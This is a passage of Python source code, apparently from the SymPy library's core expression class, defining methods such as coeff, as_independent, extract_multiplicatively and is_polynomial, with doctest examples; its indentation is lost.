c[:1] = [S.NegativeOne, -c[0]]
if cset:
clen = len(c)
c = set(c)
if clen and warn and len(c) != clen:
raise ValueError('repeated commutative arguments: %s' %
[ci for ci in c if list(self.args).count(ci) > 1])
return [c, nc]
def coeff(self, x, n=1, right=False):
"""
Returns the coefficient from the term(s) containing ``x**n`` or None. If ``n``
is zero then all terms independent of ``x`` will be returned.
When x is noncommutative, the coeff to the left (default) or right of x
can be returned. The keyword 'right' is ignored when x is commutative.
See Also
========
as_coefficient: separate the expression into a coefficient and factor
as_coeff_Add: separate the additive constant from an expression
as_coeff_Mul: separate the multiplicative constant from an expression
as_independent: separate x-dependent terms/factors from others
sympy.polys.polytools.coeff_monomial: efficiently find the single coefficient of a monomial in Poly
sympy.polys.polytools.nth: like coeff_monomial but powers of monomial terms are used
Examples
========
>>> from sympy import symbols
>>> from sympy.abc import x, y, z
You can select terms that have an explicit negative in front of them:
>>> (-x + 2*y).coeff(-1)
x
>>> (x - 2*y).coeff(-1)
2*y
You can select terms with no Rational coefficient:
>>> (x + 2*y).coeff(1)
x
>>> (3 + 2*x + 4*x**2).coeff(1)
0
You can select terms independent of x by making n=0; in this case
expr.as_independent(x)[0] is returned (and 0 will be returned instead
of None):
>>> (3 + 2*x + 4*x**2).coeff(x, 0)
3
>>> eq = ((x + 1)**3).expand() + 1
>>> eq
x**3 + 3*x**2 + 3*x + 2
>>> [eq.coeff(x, i) for i in reversed(range(4))]
[1, 3, 3, 2]
>>> eq -= 2
>>> [eq.coeff(x, i) for i in reversed(range(4))]
[1, 3, 3, 0]
You can select terms that have a numerical term in front of them:
>>> (-x - 2*y).coeff(2)
-y
>>> from sympy import sqrt
>>> (x + sqrt(2)*x).coeff(sqrt(2))
x
The matching is exact:
>>> (3 + 2*x + 4*x**2).coeff(x)
2
>>> (3 + 2*x + 4*x**2).coeff(x**2)
4
>>> (3 + 2*x + 4*x**2).coeff(x**3)
0
>>> (z*(x + y)**2).coeff((x + y)**2)
z
>>> (z*(x + y)**2).coeff(x + y)
0
In addition, no factoring is done, so 1 + z*(1 + y) is not obtained
from the following:
>>> (x + z*(x + x*y)).coeff(x)
1
If such factoring is desired, factor_terms can be used first:
>>> from sympy import factor_terms
>>> factor_terms(x + z*(x + x*y)).coeff(x)
z*(y + 1) + 1
>>> n, m, o = symbols('n m o', commutative=False)
>>> n.coeff(n)
1
>>> (3*n).coeff(n)
3
>>> (n*m + m*n*m).coeff(n) # = (1 + m)*n*m
1 + m
>>> (n*m + m*n*m).coeff(n, right=True) # = (1 + m)*n*m
m
If there is more than one possible coefficient 0 is returned:
>>> (n*m + m*n).coeff(n)
0
If there is only one possible coefficient, it is returned:
>>> (n*m + x*m*n).coeff(m*n)
x
>>> (n*m + x*m*n).coeff(m*n, right=1)
1
"""
x = sympify(x)
if not isinstance(x, Basic):
return S.Zero
n = as_int(n)
if not x:
return S.Zero
if x == self:
if n == 1:
return S.One
return S.Zero
if x is S.One:
co = [a for a in Add.make_args(self)
if a.as_coeff_Mul()[0] is S.One]
if not co:
return S.Zero
return Add(*co)
if n == 0:
if x.is_Add and self.is_Add:
c = self.coeff(x, right=right)
if not c:
return S.Zero
if not right:
return self - Add(*[a*x for a in Add.make_args(c)])
return self - Add(*[x*a for a in Add.make_args(c)])
return self.as_independent(x, as_Add=True)[0]
# continue with the full method, looking for this power of x:
x = x**n
def incommon(l1, l2):
if not l1 or not l2:
return []
n = min(len(l1), len(l2))
for i in range(n):
if l1[i] != l2[i]:
return l1[:i]
return l1[:]
def find(l, sub, first=True):
""" Find where list sub appears in list l. When ``first`` is True
the first occurance from the left is returned, else the last
occurance is returned. Return None if sub is not in l.
>> l = range(5)*2
>> find(l, [2, 3])
2
>> find(l, [2, 3], first=0)
7
>> find(l, [2, 4])
None
"""
if not sub or not l or len(sub) > len(l):
return None
n = len(sub)
if not first:
l.reverse()
sub.reverse()
for i in range(0, len(l) - n + 1):
if all(l[i + j] == sub[j] for j in range(n)):
break
else:
i = None
if not first:
l.reverse()
sub.reverse()
if i is not None and not first:
i = len(l) - (i + n)
return i
co = []
args = Add.make_args(self)
self_c = self.is_commutative
x_c = x.is_commutative
if self_c and not x_c:
return S.Zero
if self_c:
xargs = x.args_cnc(cset=True, warn=False)[0]
for a in args:
margs = a.args_cnc(cset=True, warn=False)[0]
if len(xargs) > len(margs):
continue
resid = margs.difference(xargs)
if len(resid) + len(xargs) == len(margs):
co.append(Mul(*resid))
if co == []:
return S.Zero
elif co:
return Add(*co)
elif x_c:
xargs = x.args_cnc(cset=True, warn=False)[0]
for a in args:
margs, nc = a.args_cnc(cset=True)
if len(xargs) > len(margs):
continue
resid = margs.difference(xargs)
if len(resid) + len(xargs) == len(margs):
co.append(Mul(*(list(resid) + nc)))
if co == []:
return S.Zero
elif co:
return Add(*co)
else: # both nc
xargs, nx = x.args_cnc(cset=True)
# find the parts that pass the commutative terms
for a in args:
margs, nc = a.args_cnc(cset=True)
if len(xargs) > len(margs):
continue
resid = margs.difference(xargs)
if len(resid) + len(xargs) == len(margs):
co.append((resid, nc))
# now check the non-comm parts
if not co:
return S.Zero
if all(n == co[0][1] for r, n in co):
ii = find(co[0][1], nx, right)
if ii is not None:
if not right:
return Mul(Add(*[Mul(*r) for r, c in co]), Mul(*co[0][1][:ii]))
else:
return Mul(*co[0][1][ii + len(nx):])
beg = reduce(incommon, (n[1] for n in co))
if beg:
ii = find(beg, nx, right)
if ii is not None:
if not right:
gcdc = co[0][0]
for i in range(1, len(co)):
gcdc = gcdc.intersection(co[i][0])
if not gcdc:
break
return Mul(*(list(gcdc) + beg[:ii]))
else:
m = ii + len(nx)
return Add(*[Mul(*(list(r) + n[m:])) for r, n in co])
end = list(reversed(
reduce(incommon, (list(reversed(n[1])) for n in co))))
if end:
ii = find(end, nx, right)
if ii is not None:
if not right:
return Add(*[Mul(*(list(r) + n[:-len(end) + ii])) for r, n in co])
else:
return Mul(*end[ii + len(nx):])
# look for single match
hit = None
for i, (r, n) in enumerate(co):
ii = find(n, nx, right)
if ii is not None:
if not hit:
hit = ii, r, n
else:
break
else:
if hit:
ii, r, n = hit
if not right:
return Mul(*(list(r) + n[:ii]))
else:
return Mul(*n[ii + len(nx):])
return S.Zero
def as_expr(self, *gens):
"""
Convert a polynomial to a SymPy expression.
Examples
========
>>> from sympy import sin
>>> from sympy.abc import x, y
>>> f = (x**2 + x*y).as_poly(x, y)
>>> f.as_expr()
x**2 + x*y
>>> sin(x).as_expr()
sin(x)
"""
return self
def as_coefficient(self, expr):
"""
Extracts symbolic coefficient at the given expression. In
other words, this functions separates 'self' into the product
of 'expr' and 'expr'-free coefficient. If such separation
is not possible it will return None.
Examples
========
>>> from sympy import E, pi, sin, I, Poly
>>> from sympy.abc import x
>>> E.as_coefficient(E)
1
>>> (2*E).as_coefficient(E)
2
>>> (2*sin(E)*E).as_coefficient(E)
Two terms have E in them so a sum is returned. (If one were
desiring the coefficient of the term exactly matching E then
the constant from the returned expression could be selected.
Or, for greater precision, a method of Poly can be used to
indicate the desired term from which the coefficient is
desired.)
>>> (2*E + x*E).as_coefficient(E)
x + 2
>>> _.args[0] # just want the exact match
2
>>> p = Poly(2*E + x*E); p
Poly(x*E + 2*E, x, E, domain='ZZ')
>>> p.coeff_monomial(E)
2
>>> p.nth(0, 1)
2
Since the following cannot be written as a product containing
E as a factor, None is returned. (If the coefficient ``2*x`` is
desired then the ``coeff`` method should be used.)
>>> (2*E*x + x).as_coefficient(E)
>>> (2*E*x + x).coeff(E)
2*x
>>> (E*(x + 1) + x).as_coefficient(E)
>>> (2*pi*I).as_coefficient(pi*I)
2
>>> (2*I).as_coefficient(pi*I)
See Also
========
coeff: return sum of terms have a given factor
as_coeff_Add: separate the additive constant from an expression
as_coeff_Mul: separate the multiplicative constant from an expression
as_independent: separate x-dependent terms/factors from others
sympy.polys.polytools.coeff_monomial: efficiently find the single coefficient of a monomial in Poly
sympy.polys.polytools.nth: like coeff_monomial but powers of monomial terms are used
"""
r = self.extract_multiplicatively(expr)
if r and not r.has(expr):
return r
def as_independent(self, *deps, **hint):
"""
A mostly naive separation of a Mul or Add into arguments that are not
are dependent on deps. To obtain as complete a separation of variables
as possible, use a separation method first, e.g.:
* separatevars() to change Mul, Add and Pow (including exp) into Mul
* .expand(mul=True) to change Add or Mul into Add
* .expand(log=True) to change log expr into an Add
The only non-naive thing that is done here is to respect noncommutative
ordering of variables and to always return (0, 0) for `self` of zero
regardless of hints.
For nonzero `self`, the returned tuple (i, d) has the
following interpretation:
* i will has no variable that appears in deps
* d will be 1 or else have terms that contain variables that are in deps
* if self is an Add then self = i + d
* if self is a Mul then self = i*d
* otherwise (self, S.One) or (S.One, self) is returned.
To force the expression to be treated as an Add, use the hint as_Add=True
Examples
========
-- self is an Add
>>> from sympy import sin, cos, exp
>>> from sympy.abc import x, y, z
>>> (x + x*y).as_independent(x)
(0, x*y + x)
>>> (x + x*y).as_independent(y)
(x, x*y)
>>> (2*x*sin(x) + y + x + z).as_independent(x)
(y + z, 2*x*sin(x) + x)
>>> (2*x*sin(x) + y + x + z).as_independent(x, y)
(z, 2*x*sin(x) + x + y)
-- self is a Mul
>>> (x*sin(x)*cos(y)).as_independent(x)
(cos(y), x*sin(x))
non-commutative terms cannot always be separated out when self is a Mul
>>> from sympy import symbols
>>> n1, n2, n3 = symbols('n1 n2 n3', commutative=False)
>>> (n1 + n1*n2).as_independent(n2)
(n1, n1*n2)
>>> (n2*n1 + n1*n2).as_independent(n2)
(0, n1*n2 + n2*n1)
>>> (n1*n2*n3).as_independent(n1)
(1, n1*n2*n3)
>>> (n1*n2*n3).as_independent(n2)
(n1, n2*n3)
>>> ((x-n1)*(x-y)).as_independent(x)
(1, (x - y)*(x - n1))
-- self is anything else:
>>> (sin(x)).as_independent(x)
(1, sin(x))
>>> (sin(x)).as_independent(y)
(sin(x), 1)
>>> exp(x+y).as_independent(x)
(1, exp(x + y))
-- force self to be treated as an Add:
>>> (3*x).as_independent(x, as_Add=True)
(0, 3*x)
-- force self to be treated as a Mul:
>>> (3+x).as_independent(x, as_Add=False)
(1, x + 3)
>>> (-3+x).as_independent(x, as_Add=False)
(1, x - 3)
Note how the below differs from the above in making the
constant on the dep term positive.
>>> (y*(-3+x)).as_independent(x)
(y, x - 3)
-- use .as_independent() for true independence testing instead
of .has(). The former considers only symbols in the free
symbols while the latter considers all symbols
>>> from sympy import Integral
>>> I = Integral(x, (x, 1, 2))
>>> I.has(x)
True
>>> x in I.free_symbols
False
>>> I.as_independent(x) == (I, 1)
True
>>> (I + x).as_independent(x) == (I, x)
True
Note: when trying to get independent terms, a separation method
might need to be used first. In this case, it is important to keep
track of what you send to this routine so you know how to interpret
the returned values
>>> from sympy import separatevars, log
>>> separatevars(exp(x+y)).as_independent(x)
(exp(y), exp(x))
>>> (x + x*y).as_independent(y)
(x, x*y)
>>> separatevars(x + x*y).as_independent(y)
(x, y + 1)
>>> (x*(1 + y)).as_independent(y)
(x, y + 1)
>>> (x*(1 + y)).expand(mul=True).as_independent(y)
(x, x*y)
>>> a, b=symbols('a b', positive=True)
>>> (log(a*b).expand(log=True)).as_independent(b)
(log(a), log(b))
See Also
========
.separatevars(), .expand(log=True), Add.as_two_terms(),
Mul.as_two_terms(), .as_coeff_add(), .as_coeff_mul()
"""
from .symbol import Symbol
from .add import _unevaluated_Add
from .mul import _unevaluated_Mul
from sympy.utilities.iterables import sift
if self.is_zero:
return S.Zero, S.Zero
func = self.func
if hint.get('as_Add', func is Add):
want = Add
else:
want = Mul
if func is not want and (func is Add or func is Mul):
return (want.identity, self)
# sift out deps into symbolic and other and ignore
# all symbols but those that are in the free symbols
sym = set()
other = []
for d in deps:
if isinstance(d, Symbol): # Symbol.is_Symbol is True
sym.add(d)
else:
other.append(d)
def has(e):
"""return the standard has() if there are no literal symbols, else
check to see that symbol-deps are in the free symbols."""
has_other = e.has(*other)
if not sym:
return has_other
return has_other or e.has(*(e.free_symbols & sym))
if (want is not func or
func is not Add and func is not Mul):
if has(self):
return (want.identity, self)
else:
return (self, want.identity)
else:
if func is Add:
args = list(self.args)
else:
args, nc = self.args_cnc()
d = sift(args, lambda x: has(x))
depend = d[True]
indep = d[False]
if func is Add: # all terms were treated as commutative
return (Add(*indep), _unevaluated_Add(*depend))
else: # handle noncommutative by stopping at first dependent term
for i, n in enumerate(nc):
if has(n):
depend.extend(nc[i:])
break
indep.append(n)
return Mul(*indep), (
Mul(*depend, evaluate=False) if nc else
_unevaluated_Mul(*depend))
def as_real_imag(self, deep=True, **hints):
"""Performs complex expansion on 'self' and returns a tuple
containing collected both real and imaginary parts. This
method can't be confused with re() and im() functions,
which does not perform complex expansion at evaluation.
However it is possible to expand both re() and im()
functions and get exactly the same results as with
a single call to this function.
>>> from sympy import symbols, I
>>> x, y = symbols('x,y', real=True)
>>> (x + y*I).as_real_imag()
(x, y)
>>> from sympy.abc import z, w
>>> (z + w*I).as_real_imag()
(re(z) - im(w), re(w) + im(z))
"""
from sympy import im, re
if hints.get('ignore') == self:
return None
else:
return (re(self), im(self))
def as_powers_dict(self):
"""Return self as a dictionary of factors with each factor being
treated as a power. The keys are the bases of the factors and the
values, the corresponding exponents. The resulting dictionary should
be used with caution if the expression is a Mul and contains non-
commutative factors since the order that they appeared will be lost in
the dictionary."""
d = defaultdict(int)
d.update(dict([self.as_base_exp()]))
return d
def as_coefficients_dict(self):
"""Return a dictionary mapping terms to their Rational coefficient.
Since the dictionary is a defaultdict, inquiries about terms which
were not present will return a coefficient of 0. If an expression is
not an Add it is considered to have a single term.
Examples
========
>>> from sympy.abc import a, x
>>> (3*x + a*x + 4).as_coefficients_dict()
{1: 4, x: 3, a*x: 1}
>>> _[a]
0
>>> (3*a*x).as_coefficients_dict()
{a*x: 3}
"""
c, m = self.as_coeff_Mul()
if not c.is_Rational:
c = S.One
m = self
d = defaultdict(int)
d.update({m: c})
return d
def as_base_exp(self):
# a -> b ** e
return self, S.One
def as_coeff_mul(self, *deps, **kwargs):
"""Return the tuple (c, args) where self is written as a Mul, ``m``.
c should be a Rational multiplied by any terms of the Mul that are
independent of deps.
args should be a tuple of all other terms of m; args is empty
if self is a Number or if self is independent of deps (when given).
This should be used when you don't know if self is a Mul or not but
you want to treat self as a Mul or if you want to process the
individual arguments of the tail of self as a Mul.
- if you know self is a Mul and want only the head, use self.args[0];
- if you don't want to process the arguments of the tail but need the
tail then use self.as_two_terms() which gives the head and tail;
- if you want to split self into an independent and dependent parts
use ``self.as_independent(*deps)``
>>> from sympy import S
>>> from sympy.abc import x, y
>>> (S(3)).as_coeff_mul()
(3, ())
>>> (3*x*y).as_coeff_mul()
(3, (x, y))
>>> (3*x*y).as_coeff_mul(x)
(3*y, (x,))
>>> (3*y).as_coeff_mul(x)
(3*y, ())
"""
if deps:
if not self.has(*deps):
return self, tuple()
return S.One, (self,)
def as_coeff_add(self, *deps):
"""Return the tuple (c, args) where self is written as an Add, ``a``.
c should be a Rational added to any terms of the Add that are
independent of deps.
args should be a tuple of all other terms of ``a``; args is empty
if self is a Number or if self is independent of deps (when given).
This should be used when you don't know if self is an Add or not but
you want to treat self as an Add or if you want to process the
individual arguments of the tail of self as an Add.
- if you know self is an Add and want only the head, use self.args[0];
- if you don't want to process the arguments of the tail but need the
tail then use self.as_two_terms() which gives the head and tail.
- if you want to split self into an independent and dependent parts
use ``self.as_independent(*deps)``
>>> from sympy import S
>>> from sympy.abc import x, y
>>> (S(3)).as_coeff_add()
(3, ())
>>> (3 + x).as_coeff_add()
(3, (x,))
>>> (3 + x + y).as_coeff_add(x)
(y + 3, (x,))
>>> (3 + y).as_coeff_add(x)
(y + 3, ())
"""
if deps:
if not self.has(*deps):
return self, tuple()
return S.Zero, (self,)
def primitive(self):
"""Return the positive Rational that can be extracted non-recursively
from every term of self (i.e., self is treated like an Add). This is
like the as_coeff_Mul() method but primitive always extracts a positive
Rational (never a negative or a Float).
Examples
========
>>> from sympy.abc import x
>>> (3*(x + 1)**2).primitive()
(3, (x + 1)**2)
>>> a = (6*x + 2); a.primitive()
(2, 3*x + 1)
>>> b = (x/2 + 3); b.primitive()
(1/2, x + 6)
>>> (a*b).primitive() == (1, a*b)
True
"""
if not self:
return S.One, S.Zero
c, r = self.as_coeff_Mul(rational=True)
if c.is_negative:
c, r = -c, -r
return c, r
def as_content_primitive(self, radical=False, clear=True):
"""This method should recursively remove a Rational from all arguments
and return that (content) and the new self (primitive). The content
should always be positive and ``Mul(*foo.as_content_primitive()) == foo``.
The primitive need no be in canonical form and should try to preserve
the underlying structure if possible (i.e. expand_mul should not be
applied to self).
Examples
========
>>> from sympy import sqrt
>>> from sympy.abc import x, y, z
>>> eq = 2 + 2*x + 2*y*(3 + 3*y)
The as_content_primitive function is recursive and retains structure:
>>> eq.as_content_primitive()
(2, x + 3*y*(y + 1) + 1)
Integer powers will have Rationals extracted from the base:
>>> ((2 + 6*x)**2).as_content_primitive()
(4, (3*x + 1)**2)
>>> ((2 + 6*x)**(2*y)).as_content_primitive()
(1, (2*(3*x + 1))**(2*y))
Terms may end up joining once their as_content_primitives are added:
>>> ((5*(x*(1 + y)) + 2*x*(3 + 3*y))).as_content_primitive()
(11, x*(y + 1))
>>> ((3*(x*(1 + y)) + 2*x*(3 + 3*y))).as_content_primitive()
(9, x*(y + 1))
>>> ((3*(z*(1 + y)) + 2.0*x*(3 + 3*y))).as_content_primitive()
(1, 6.0*x*(y + 1) + 3*z*(y + 1))
>>> ((5*(x*(1 + y)) + 2*x*(3 + 3*y))**2).as_content_primitive()
(121, x**2*(y + 1)**2)
>>> ((5*(x*(1 + y)) + 2.0*x*(3 + 3*y))**2).as_content_primitive()
(1, 121.0*x**2*(y + 1)**2)
Radical content can also be factored out of the primitive:
>>> (2*sqrt(2) + 4*sqrt(10)).as_content_primitive(radical=True)
(2, sqrt(2)*(1 + 2*sqrt(5)))
If clear=False (default is True) then content will not be removed
from an Add if it can be distributed to leave one or more
terms with integer coefficients.
>>> (x/2 + y).as_content_primitive()
(1/2, x + 2*y)
>>> (x/2 + y).as_content_primitive(clear=False)
(1, x/2 + y)
"""
return S.One, self
def as_numer_denom(self):
""" expression -> a/b -> a, b
This is just a stub that should be defined by
an object's class methods to get anything else.
See Also
========
normal: return a/b instead of a, b
"""
return self, S.One
def normal(self):
n, d = self.as_numer_denom()
if d is S.One:
return n
return n/d
def extract_multiplicatively(self, c):
"""Return None if it's not possible to make self in the form
c * something in a nice way, i.e. preserving the properties
of arguments of self.
>>> from sympy import symbols, Rational
>>> x, y = symbols('x,y', real=True)
>>> ((x*y)**3).extract_multiplicatively(x**2 * y)
x*y**2
>>> ((x*y)**3).extract_multiplicatively(x**4 * y)
>>> (2*x).extract_multiplicatively(2)
x
>>> (2*x).extract_multiplicatively(3)
>>> (Rational(1, 2)*x).extract_multiplicatively(3)
x/6
"""
c = sympify(c)
if self is S.NaN:
return None
if c is S.One:
return self
elif c == self:
return S.One
if c.is_Add:
cc, pc = c.primitive()
if cc is not S.One:
c = Mul(cc, pc, evaluate=False)
if c.is_Mul:
a, b = c.as_two_terms()
x = self.extract_multiplicatively(a)
if x is not None:
return x.extract_multiplicatively(b)
quotient = self / c
if self.is_Number:
if self is S.Infinity:
if c.is_positive:
return S.Infinity
elif self is S.NegativeInfinity:
if c.is_negative:
return S.Infinity
elif c.is_positive:
return S.NegativeInfinity
elif self is S.ComplexInfinity:
if not c.is_zero:
return S.ComplexInfinity
elif self.is_Integer:
if not quotient.is_Integer:
return None
elif self.is_positive and quotient.is_negative:
return None
else:
return quotient
elif self.is_Rational:
if not quotient.is_Rational:
return None
elif self.is_positive and quotient.is_negative:
return None
else:
return quotient
elif self.is_Float:
if not quotient.is_Float:
return None
elif self.is_positive and quotient.is_negative:
return None
else:
return quotient
elif self.is_NumberSymbol or self.is_Symbol or self is S.ImaginaryUnit:
if quotient.is_Mul and len(quotient.args) == 2:
if quotient.args[0].is_Integer and quotient.args[0].is_positive and quotient.args[1] == self:
return quotient
elif quotient.is_Integer and c.is_Number:
return quotient
elif self.is_Add:
cs, ps = self.primitive()
if cs is not S.One:
return Mul(cs, ps, evaluate=False).extract_multiplicatively(c)
newargs = []
for arg in self.args:
newarg = arg.extract_multiplicatively(c)
if newarg is not None:
newargs.append(newarg)
else:
return None
return Add(*newargs)
elif self.is_Mul:
args = list(self.args)
for i, arg in enumerate(args):
newarg = arg.extract_multiplicatively(c)
if newarg is not None:
args[i] = newarg
return Mul(*args)
elif self.is_Pow:
if c.is_Pow and c.base == self.base:
new_exp = self.exp.extract_additively(c.exp)
if new_exp is not None:
return self.base ** (new_exp)
elif c == self.base:
new_exp = self.exp.extract_additively(1)
if new_exp is not None:
return self.base ** (new_exp)
def extract_additively(self, c):
"""Return self - c if it's possible to subtract c from self and
make all matching coefficients move towards zero, else return None.
Examples
========
>>> from sympy.abc import x, y
>>> e = 2*x + 3
>>> e.extract_additively(x + 1)
x + 2
>>> e.extract_additively(3*x)
>>> e.extract_additively(4)
>>> (y*(x + 1)).extract_additively(x + 1)
>>> ((x + 1)*(x + 2*y + 1) + 3).extract_additively(x + 1)
(x + 1)*(x + 2*y) + 3
Sometimes auto-expansion will return a less simplified result
than desired; gcd_terms might be used in such cases:
>>> from sympy import gcd_terms
>>> (4*x*(y + 1) + y).extract_additively(x)
4*x*(y + 1) + x*(4*y + 3) - x*(4*y + 4) + y
>>> gcd_terms(_)
x*(4*y + 3) + y
See Also
========
extract_multiplicatively
coeff
as_coefficient
"""
c = sympify(c)
if self is S.NaN:
return None
if c is S.Zero:
return self
elif c == self:
return S.Zero
elif self is S.Zero:
return None
if self.is_Number:
if not c.is_Number:
return None
co = self
diff = co - c
# XXX should we match types? i.e should 3 - .1 succeed?
if (co > 0 and diff > 0 and diff < co or
co < 0 and diff < 0 and diff > co):
return diff
return None
if c.is_Number:
co, t = self.as_coeff_Add()
xa = co.extract_additively(c)
if xa is None:
return None
return xa + t
# handle the args[0].is_Number case separately
# since we will have trouble looking for the coeff of
# a number.
if c.is_Add and c.args[0].is_Number:
# whole term as a term factor
co = self.coeff(c)
xa0 = (co.extract_additively(1) or 0)*c
if xa0:
diff = self - co*c
return (xa0 + (diff.extract_additively(c) or diff)) or None
# term-wise
h, t = c.as_coeff_Add()
sh, st = self.as_coeff_Add()
xa = sh.extract_additively(h)
if xa is None:
return None
xa2 = st.extract_additively(t)
if xa2 is None:
return None
return xa + xa2
# whole term as a term factor
co = self.coeff(c)
xa0 = (co.extract_additively(1) or 0)*c
if xa0:
diff = self - co*c
return (xa0 + (diff.extract_additively(c) or diff)) or None
# term-wise
coeffs = []
for a in Add.make_args(c):
ac, at = a.as_coeff_Mul()
co = self.coeff(at)
if not co:
return None
coc, cot = co.as_coeff_Add()
xa = coc.extract_additively(ac)
if xa is None:
return None
self -= co*at
coeffs.append((cot + xa)*at)
coeffs.append(self)
return Add(*coeffs)
def could_extract_minus_sign(self):
"""Canonical way to choose an element in the set {e, -e} where
e is any expression. If the canonical element is e, we have
e.could_extract_minus_sign() == True, else
e.could_extract_minus_sign() == False.
For any expression, the set ``{e.could_extract_minus_sign(),
(-e).could_extract_minus_sign()}`` must be ``{True, False}``.
>>> from sympy.abc import x, y
>>> (x-y).could_extract_minus_sign() != (y-x).could_extract_minus_sign()
True
"""
negative_self = -self
self_has_minus = (self.extract_multiplicatively(-1) is not None)
negative_self_has_minus = (
(negative_self).extract_multiplicatively(-1) is not None)
if self_has_minus != negative_self_has_minus:
return self_has_minus
else:
if self.is_Add:
# We choose the one with less arguments with minus signs
all_args = len(self.args)
negative_args = len([False for arg in self.args if arg.could_extract_minus_sign()])
positive_args = all_args - negative_args
if positive_args > negative_args:
return False
elif positive_args < negative_args:
return True
elif self.is_Mul:
# We choose the one with an odd number of minus signs
num, den = self.as_numer_denom()
args = Mul.make_args(num) + Mul.make_args(den)
arg_signs = [arg.could_extract_minus_sign() for arg in args]
negative_args = list(filter(None, arg_signs))
return len(negative_args) % 2 == 1
# As a last resort, we choose the one with greater value of .sort_key()
return bool(self.sort_key() < negative_self.sort_key())
def extract_branch_factor(self, allow_half=False):
"""
Try to write self as ``exp_polar(2*pi*I*n)*z`` in a nice way.
Return (z, n).
>>> from sympy import exp_polar, I, pi
>>> from sympy.abc import x, y
>>> exp_polar(I*pi).extract_branch_factor()
(exp_polar(I*pi), 0)
>>> exp_polar(2*I*pi).extract_branch_factor()
(1, 1)
>>> exp_polar(-pi*I).extract_branch_factor()
(exp_polar(I*pi), -1)
>>> exp_polar(3*pi*I + x).extract_branch_factor()
(exp_polar(x + I*pi), 1)
>>> (y*exp_polar(-5*pi*I)*exp_polar(3*pi*I + 2*pi*x)).extract_branch_factor()
(y*exp_polar(2*pi*x), -1)
>>> exp_polar(-I*pi/2).extract_branch_factor()
(exp_polar(-I*pi/2), 0)
If allow_half is True, also extract exp_polar(I*pi):
>>> exp_polar(I*pi).extract_branch_factor(allow_half=True)
(1, 1/2)
>>> exp_polar(2*I*pi).extract_branch_factor(allow_half=True)
(1, 1)
>>> exp_polar(3*I*pi).extract_branch_factor(allow_half=True)
(1, 3/2)
>>> exp_polar(-I*pi).extract_branch_factor(allow_half=True)
(1, -1/2)
"""
from sympy import exp_polar, pi, I, ceiling, Add
n = S(0)
res = S(1)
args = Mul.make_args(self)
exps = []
for arg in args:
if arg.func is exp_polar:
exps += [arg.exp]
else:
res *= arg
piimult = S(0)
extras = []
while exps:
exp = exps.pop()
if exp.is_Add:
exps += exp.args
continue
if exp.is_Mul:
coeff = exp.as_coefficient(pi*I)
if coeff is not None:
piimult += coeff
continue
extras += [exp]
if not piimult.free_symbols:
coeff = piimult
tail = ()
else:
coeff, tail = piimult.as_coeff_add(*piimult.free_symbols)
# round down to nearest multiple of 2
branchfact = ceiling(coeff/2 - S(1)/2)*2
n += branchfact/2
c = coeff - branchfact
if allow_half:
nc = c.extract_additively(1)
if nc is not None:
n += S(1)/2
c = nc
newexp = pi*I*Add(*((c, ) + tail)) + Add(*extras)
if newexp != 0:
res *= exp_polar(newexp)
return res, n
def _eval_is_polynomial(self, syms):
if self.free_symbols.intersection(syms) == set([]):
return True
return False
def is_polynomial(self, *syms):
"""
Return True if self is a polynomial in syms and False otherwise.
This checks if self is an exact polynomial in syms. This function
returns False for expressions that are "polynomials" with symbolic
exponents. Thus, you should be able to apply polynomial algorithms to
expressions for which this returns True, and Poly(expr, \*syms) should
work if and only if expr.is_polynomial(\*syms) returns True. The
polynomial does not have to be in expanded form. If no symbols are
given, all free symbols in the expression will be used.
This is not part of the assumptions system. You cannot do
Symbol('z', polynomial=True).
Examples
========
>>> from sympy import Symbol
>>> x = Symbol('x')
>>> ((x**2 + 1)**4).is_polynomial(x)
True
>>> ((x**2 + 1)**4).is_polynomial()
True
>>> (2**x + 1).is_polynomial(x)
False
>>> n = Symbol('n', nonnegative=True, integer=True)
>>> (x**n + 1).is_polynomial(x)
False
This function does not attempt any nontrivial simplifications that may
result in an expression that does not appear to be a polynomial to
become one.
>>> from sympy import sqrt, factor, cancel
>>> y = Symbol('y', positive=True)
>>> a = sqrt(y**2 + 2*y + 1)
>>> a.is_polynomial(y)
False
>>> factor(a)
y + 1
>>> factor(a).is_polynomial(y)
True
>>> b = (y**2 + 2*y + 1)/(y + 1)
>>> b.is_polynomial(y)
False
>>> cancel(b)
y + 1
>>> cancel(b).is_polynomial(y)
True
See also .is_rational_function()
"""
if syms:
syms = set(map(sympify, syms))
else:
syms = self.free_symbols
if syms.intersection(self.free_symbols) == set([]):
# constant polynomial
return True
else:
return self._eval_is_polynomial(syms)
def _eval_is_rational_function(self, syms):
if self.free_symbols.intersection(syms) == set([]):
return True
return False
def is_rational_function(self, *syms):
"""
Test whether function is a ratio of two polynomials in the given
symbols, syms. When syms is not given, all free symbols will be used.
The rational function does not have to be in expanded or in any kind of
canonical form.
This function returns False for expressions that are "rational
functions" with symbolic exponents. Thus, you should be able to call
.as_numer_denom() and apply polynomial algorithms to the result for
expressions for which this returns True.
This is not part of the assumptions system. You cannot do
Symbol('z', rational_function=True).
Examples
========
>>> from sympy import Symbol, sin
>>> from sympy.abc import x, y
>>> (x/y).is_rational_function()
True
>>> (x**2).is_rational_function()
True
>>> (x/sin(y)).is_rational_function(y)
False
>>> n = Symbol('n', integer=True)
>>> (x**n + 1).is_rational_function(x)
False
This function does not attempt any nontrivial simplifications that may
result in an expression that does not appear to be a rational function
to become one.
>>> from sympy import sqrt, factor
>>> y = Symbol('y', positive=True)
>>> a = sqrt(y**2 + 2*y + 1)/y
>>> a.is_rational_function(y)
False
>>> factor(a)
(y + 1)/y
>>> factor(a).is_rational_function(y)
True
See also is_algebraic_expr().
"""
if self in [S.NaN, S.Infinity, -S.Infinity, S.ComplexInfinity]:
return False
if syms:
syms = set(map(sympify, syms))
else:
syms = self.free_symbols
if syms.intersection(self.free_symbols) == set([]):
# constant rational function
return True
else:
return self._eval_is_rational_function(syms)
def _eval_is_algebraic_expr(self, syms):
if self.free_symbols.intersection(syms) == set([]):
return True
return False
def is_algebraic_expr(self, *syms):
"""
This tests whether a given expression is algebraic or not, in the
given symbols, syms. When syms is not given, all free symbols
will be used. The rational function does not have to be in expanded
or in any kind of canonical form.
This function returns False for expressions that are "algebraic
expressions" with symbolic exponents. This is a simple extension to the
is_rational_function, including rational exponentiation.
Examples
========
>>> from sympy import Symbol, sqrt
>>> x = Symbol('x', real=True)
>>> sqrt(1 + x).is_rational_function()
False
>>> sqrt(1 + x).is_algebraic_expr()
True
This function does not attempt any nontrivial simplifications that may
result in an expression that does not appear to be an algebraic
expression to become one.
>>> from sympy import exp, factor
>>> a = sqrt(exp(x)**2 + 2*exp(x) + 1)/(exp(x) + 1)
>>> a.is_algebraic_expr(x)
False
